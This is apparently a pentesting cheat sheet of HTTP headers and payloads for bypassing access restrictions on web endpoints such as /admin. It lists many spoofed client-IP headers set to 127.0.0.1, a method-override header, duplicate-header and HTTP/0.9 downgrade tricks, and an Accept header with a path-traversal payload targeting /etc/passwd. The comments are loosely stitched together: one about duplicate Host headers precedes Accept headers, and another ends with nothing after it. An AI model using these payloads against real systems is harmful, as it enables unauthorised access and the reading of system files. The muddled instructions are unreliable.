# Add something like 127.0.0.1, localhost, 192.168.1.2, target.com or /admin, /console
X-Custom-IP-Authorization:
# Try sending the same Host header twice (duplicate headers); a front-end proxy and the back-end may honor different copies
Accept: application/json, text/javascript, */*; q=0.01
Accept: ../../../../../../../../../etc/passwd{{'
# Try downgrading the request line from HTTP/1.1 to HTTP/0.9 and dropping the Host header (HTTP/0.9 has no headers at all, so only the request line is sent)
# Client-IP headers some back-ends trust - set them to 127.0.0.1 or localhost to pose as an allow-listed address
Forwarded-For-Ip: 127.0.0.1
True-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-By: localhost
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For-Original: localhost
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: localhost
X-Forwarded-Server: 127.0.0.1
X-Forwarded-Server: localhost
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Host: localhost
X-HTTP-Host-Override: 127.0.0.1
X-Originating-IP: 127.0.0.1
# Fake Origin - make a GET request to an accessible endpoint with:
# Also try putting an absolute URL in the request line, e.g. GET https://domain.com/admin HTTP/1.1
# Method-override header - try when the HTTP verb itself is what is being filtered
X-HTTP-Method-Override: PUT
GET https://vulnerable-website.com/ HTTP/1.1
Host: vulnerable-website.com
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/BurpSuite-ParamMiner/lowercase-headers
https://github.com/danielmiessler/SecLists/tree/bbb4d86ec1e234b5d3cfa0a4ab3e20c9d5006405/Miscellaneous/web/http-request-headers